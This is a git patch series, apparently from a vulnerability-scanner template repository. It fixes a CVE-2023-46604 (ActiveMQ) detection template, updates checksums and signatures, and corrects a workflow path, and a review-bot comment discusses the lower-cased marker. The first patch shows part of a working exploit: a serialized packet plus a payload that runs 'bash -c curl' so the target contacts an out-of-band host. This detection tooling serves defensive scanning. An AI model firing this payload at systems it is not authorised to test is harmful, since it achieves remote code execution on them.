From 0c131b2eac88b33ac1d0059f790327224381deca Mon Sep 17 00:00:00 2001
From: mzack
Date: Thu, 21 Mar 2024 02:57:08 +0100
Subject: [PATCH 1/6] fixing faulty template
---
 javascript/cves/2023/CVE-2023-46604.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml
index 40231ce6c3..e7326fd2cf 100644
--- a/javascript/cves/2023/CVE-2023-46604.yaml
+++ b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -40,7 +40,7 @@ javascript:
 let b = m2.Buffer();
 let name=Host+':'+Port;
 let conn = m1.Open('tcp', name);
- let randomvar = '{{randstr}}'
+ let randomvar = '{{randstr}}'.toLowerCase();
 var Base64={encode: btoa}
 exploit_xml=`http://${oob}/b64_body:`+Base64.encode(' bash-ccurl http://$(echo '+randomvar+').'+oob+' ') +'/'
 packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
From 6405d33af9f23be45dddecb8ba18bd4d9cf41225 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 22 Mar 2024 07:33:10 +0000
Subject: [PATCH 3/6] Auto Generated Templates Checksum [Fri Mar 22 07:33:10 UTC 2024] :robot:
---
 templates-checksum.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 1eb6877577..d127627215 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
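Review bot: The added `.toLowerCase()` on `randomvar` in the CVE-2023-46604.yaml hunk has no comment saying why the marker must be lower-case, so a later cleanup could drop it and silently bring back the missed detections. Presumably the out-of-band DNS interaction is recorded in lower case while `{{randstr}}` can contain upper-case characters, which would make the case-sensitive `contains(interactsh_request, response)` matcher (visible as context in PATCH 4/6) fail on a vulnerable host. I would add a line above the assignment such as `// the interaction log reports DNS names lower-cased; keep the marker lower-case so the matcher can find it`. If that is the cause, lower-casing both operands in the matcher too would make the check independent of how the marker is generated. The enclosing script block starts and ends outside this hunk, so the link between `randomvar` and `response` is not confirmed from here.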
@@ -5133,7 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 -http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 +http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb -javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 +javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad 
@@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c +templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e1bb9d7d85824378d721f07c1fb01be1a848eb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:34:51 +0000 Subject: [PATCH 4/6] Auto Template Signing [Fri Mar 22 07:34:51 UTC 2024] :robot: --- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index e7326fd2cf..926ccba63a 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -61,4 +61,4 @@ javascript: - 'contains(interactsh_protocol, "dns")' - 'contains(interactsh_request, response)' condition: and -# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 08dc5c90c719016bdacd116a3228664310c5d5bc Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran Date: Fri, 22 Mar 2024 13:07:25 +0530 Subject: [PATCH 5/6] update-workflow --- workflows/default-application-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml index 03b65efc24..42b418ab7f 100644 --- a/workflows/default-application-workflow.yaml +++ b/workflows/default-application-workflow.yaml @@ -4,6 +4,7 @@ info: name: Default Web Application Detection author: andydoering description: Detects default installations of web applications + workflows: - template: http/technologies/apache/default-apache-test-all.yaml @@ -23,7 +24,7 @@ workflows: - template: http/technologies/default-django-page.yaml - - template: http/exposures/files/drupal-install.yaml + - template: http/misconfiguration/installer/drupal-install.yaml - template: http/technologies/oracle/default-oracle-application-page.yaml From c37769da01b0ac4def0c3779676b47367c6c4b8f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:41:50 +0000 Subject: [PATCH 6/6] Auto Generated Templates Checksum [Fri Mar 22 07:41:50 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d127627215..05fe547af1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
@@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb -javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d +javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65 +templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 
@@ -8215,7 +8215,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d -workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb +workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139 workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5 workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779